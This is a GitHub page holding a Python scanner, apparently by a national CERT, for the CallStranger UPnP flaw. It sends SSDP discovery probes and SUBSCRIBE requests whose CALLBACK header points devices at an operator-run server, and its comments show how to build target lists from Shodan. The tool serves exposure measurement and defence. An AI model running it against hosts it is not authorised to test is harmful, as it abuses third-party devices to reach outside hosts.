-
Notifications
You must be signed in to change notification settings - Fork 0
/
callstranger_scan.py
executable file
·144 lines (120 loc) · 4.5 KB
/
callstranger_scan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
#!/usr/bin/env python3
## CallStranger scanner
# Usage:
# 1. install dependencies (python3, requests, urllib3) (see Installation)
# 2. create a list of potentially vulnerable hosts (one IP per line), e.g.
# ```
# shodan download port1900.json "port:1900 country:sk"
# gunzip -c port1900.json.gz | jq -r .ip_str | sort | uniq | shuf > ips
# ```
# 3. (optional) tweak SSDP_TIMEOUT and SSDP_MAX_ATTEMPTS
# 4. prepare your callback web server (any http server will do)
# 5. run the scan
# ```
# ./callstranger_scan.py ips "http://x.x.x.x:80/callback" | tee scan.log
# ```
# 6. collect results from httpd logs on your callback host (x.x.x.x)
#
# Output:
# - stdout - CSV of all identified eventSubURLs in the following format:
# "host;eventSubURL;http-status-code;http-response-len"
# devices that responded with http status 200 are most likely vulnerable.
# `grep ';200;[^;]*$' scan.log | cut -d';' -f1 | sort | uniq`
# (tested only on small sample. might produce false positives. better check your httpd logs...)
#
# - stderr - errors and other debugging stuff :)
#
# Installation:
# ```
# apt-get install -y python3-virtualenv
# virtualenv -p python3 callstranger
# . ./callstranger/bin/activate
# pip3 install requests
# ```
# jsk @ SK-CERT, 2020-04-13
import re
import socket
import sys
import time
import urllib.parse
import xml.etree.ElementTree

import requests
import urllib3
def debug(*args, **kwargs):
    """Print a diagnostic message, by default to stderr.

    Accepts the same positional and keyword arguments as ``print``. Output
    goes to ``sys.stderr`` so stdout stays reserved for the CSV results; a
    caller may still pass ``file=`` explicitly to redirect it.
    """
    # setdefault (instead of a hard-coded file=sys.stderr) avoids a
    # "multiple values for keyword argument 'file'" TypeError when the
    # caller supplies its own stream.
    kwargs.setdefault('file', sys.stderr)
    print(*args, **kwargs)
def fail(*args, **kwargs):
    """Print an error message (by default to stderr) and exit with status 1.

    Accepts the same positional and keyword arguments as ``print``.

    Raises:
        SystemExit: always, with exit code 1.
    """
    # setdefault keeps stderr as the default stream while still allowing an
    # explicit file= without a duplicate-keyword TypeError.
    kwargs.setdefault('file', sys.stderr)
    print(*args, **kwargs)
    sys.exit(1)
# XXX: tweakables
# SSDP discovery pacing. Each discovery round sends one probe per host that
# has not answered yet, sleeping SSDP_SLEEP seconds after every probe, then
# reads replies until the socket has been silent for SSDP_TIMEOUT seconds.
# At most SSDP_MAX_ATTEMPTS rounds are run, so a rough upper bound for the
# discovery phase is
#   SSDP_MAX_ATTEMPTS * (number_of_hosts * SSDP_SLEEP + SSDP_TIMEOUT)
# plus the time spent receiving replies.
SSDP_TIMEOUT = 10
SSDP_MAX_ATTEMPTS = 10
SSDP_SLEEP = 0.1
# number of seconds sent as "Second-<n>" in the TIMEOUT header of the
# SUBSCRIBE request (presumably the requested subscription duration, i.e.
# how long the device may keep calling back - confirm against the UPnP spec)
UPNP_TIMEOUT = 180
# parse arguments
#   argv[1] - path to a text file with one target IP address per line
#   argv[2] - callback URL that vulnerable devices will be asked to call
if len(sys.argv) != 3:
    fail("usage: %s IP_LIST CALLBACK" % sys.argv[0])
UPNP_CALLBACK = sys.argv[2]
# hosts maps each target IP to a dict of per-host results that the later
# steps fill in. Blank lines are skipped so that no probe is ever sent to
# an empty address, and the file is closed as soon as it has been read.
try:
    with open(sys.argv[1], 'r') as ip_list:
        stripped_lines = (line.strip() for line in ip_list)
        hosts = {ip: {} for ip in stripped_lines if ip}
except OSError as err:
    fail("cannot read IP list %s: %s" % (sys.argv[1], err))
# 1. perform SSDP service discovery on all hosts
#
# Every host gets a unicast M-SEARCH for upnp:rootdevice on UDP port 1900.
# A host that answers gets two keys in its `hosts` entry:
#   'ssdp'          - the raw reply datagram (bytes)
#   'services_urls' - set of URLs taken from the reply's LOCATION header(s),
#                     with the host part replaced by the address the reply
#                     actually came from
# Hosts that have not answered yet are probed again in the next round, for at
# most SSDP_MAX_ATTEMPTS rounds.
msg = [
    'M-SEARCH * HTTP/1.1',
    'Host:239.255.255.250:1900',
    'ST:%s' % 'upnp:rootdevice',
    'Man:"ssdp:discover"',
    'MX:1',
    '',
    '']
# The two trailing empty items make the request end with CRLF CRLF, i.e. with
# the blank line that terminates the header section. Encoded once, reused for
# every probe.
payload = '\r\n'.join(msg).encode()

# The context manager closes the UDP socket once discovery is finished.
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) as s:
    s.settimeout(SSDP_TIMEOUT)
    for attempt in range(SSDP_MAX_ATTEMPTS):
        ips_without_ssdp = [ip for ip in hosts if 'ssdp' not in hosts[ip]]
        if not ips_without_ssdp:
            break
        for ip in ips_without_ssdp:
            debug("send SSDP discovery to %s" % ip)
            try:
                s.sendto(payload, (ip, 1900))
            except OSError as err:
                # one unreachable or malformed address must not abort the scan
                debug("failed to send SSDP discovery to %s: %s" % (ip, err))
            time.sleep(SSDP_SLEEP)
        # Collect replies until the socket stays silent for SSDP_TIMEOUT.
        while True:
            try:
                data, (remote, port) = s.recvfrom(32*1024)
            except socket.timeout:
                break
            if remote not in hosts:
                debug("ssdp response from unexpected host.", remote, data)
                continue
            # Replies come from arbitrary devices; never let a non-UTF-8
            # datagram raise and kill the scan.
            text = data.decode('utf-8', errors='replace')
            urls = re.findall('location:[ ]*(.*)', text, re.IGNORECASE)
            # Devices often advertise an internal address in LOCATION, so the
            # host part is rewritten to the address we actually reached.
            hosts[remote]['services_urls'] = set(
                re.sub('://([^:/]*)([:/])', '://'+remote+'\\2', url.strip())
                for url in urls)
            hosts[remote]['ssdp'] = data
            debug("got %d service urls from %s" % (len(hosts[remote]['services_urls']), remote))
# 2. download service xml
#
# For every description URL learned during discovery, fetch the device
# description and collect the <eventSubURL> values it declares. The resulting
# absolute URLs are accumulated in hosts[ip]['event_sub_urls'] (a set shared
# by all description URLs of that host).
# NOTE(review): a <URLBase> element in the description is not honoured;
# relative eventSubURLs are resolved against the description URL.
DESCRIPTION_TIMEOUT = 10  # seconds; without it requests.get() can block forever
for ip, host in hosts.items():
    if 'services_urls' not in host:
        continue
    for url in host['services_urls']:
        try:
            r = requests.get(url, timeout=DESCRIPTION_TIMEOUT)
        except Exception as err:
            # Best effort: any failure on one device is logged and skipped.
            # Unlike a bare except, Ctrl-C still stops the scan.
            debug("failed to download services.xml from", url, err)
            continue
        try:
            doc = xml.etree.ElementTree.fromstring(r.text)
            elements = doc.findall('.//n:eventSubURL', namespaces=dict(n='urn:schemas-upnp-org:device-1-0'))
            found = set()
            for el in elements:
                path = (el.text or '').strip()
                if not path:
                    # empty <eventSubURL/>: the service has no eventing
                    continue
                # urljoin copes with "/abs", "relative" and full URLs alike
                target = urllib.parse.urljoin(url, path)
                # Keep the request on the scanned host even when the device
                # advertises an absolute URL with a different address.
                target = re.sub('://[^:/]*', lambda m: '://' + ip, target, count=1)
                found.add(target)
        except Exception as err:
            debug("failed to parse services.xml from", url, err)
            # skip this URL instead of falling through with undefined or
            # stale results from a previous iteration
            continue
        # setdefault: keep what earlier description URLs of this host found
        host.setdefault('event_sub_urls', set()).update(found)
        debug("got %d eventSubURLs from %s" % (len(found), url))
# 3. test each eventSubURL for callback vulnerability
#
# Sends a SUBSCRIBE request with CALLBACK pointing at UPNP_CALLBACK to every
# eventSubURL and prints one CSV row per URL on stdout:
#   host;eventSubURL;http-status-code;http-response-len
# A request that fails is reported with status "-" and length 0; the reason
# goes to stderr.
SUBSCRIBE_TIMEOUT = 10  # seconds; urllib3 waits indefinitely by default
headers = {
    'NT': 'upnp:event',
    'TIMEOUT': 'Second-%d' % UPNP_TIMEOUT,
    'CALLBACK': '<%s>' % UPNP_CALLBACK,
}
http = urllib3.PoolManager()
for ip, host in hosts.items():
    if 'event_sub_urls' not in host:
        continue
    for url in host['event_sub_urls']:
        try:
            resp = http.request('SUBSCRIBE', url, headers=headers,
                                timeout=SUBSCRIBE_TIMEOUT)
            row = [ip, url, resp.status, len(resp.data)]
        except Exception as err:
            # Best effort per URL; unlike a bare except this still lets
            # Ctrl-C (KeyboardInterrupt) stop the scan.
            debug("SUBSCRIBE to %s failed: %s" % (url, err))
            row = [ip, url, "-", 0]
        print(';'.join(str(v) for v in row))
# 4. collect results on callback url
# XXX: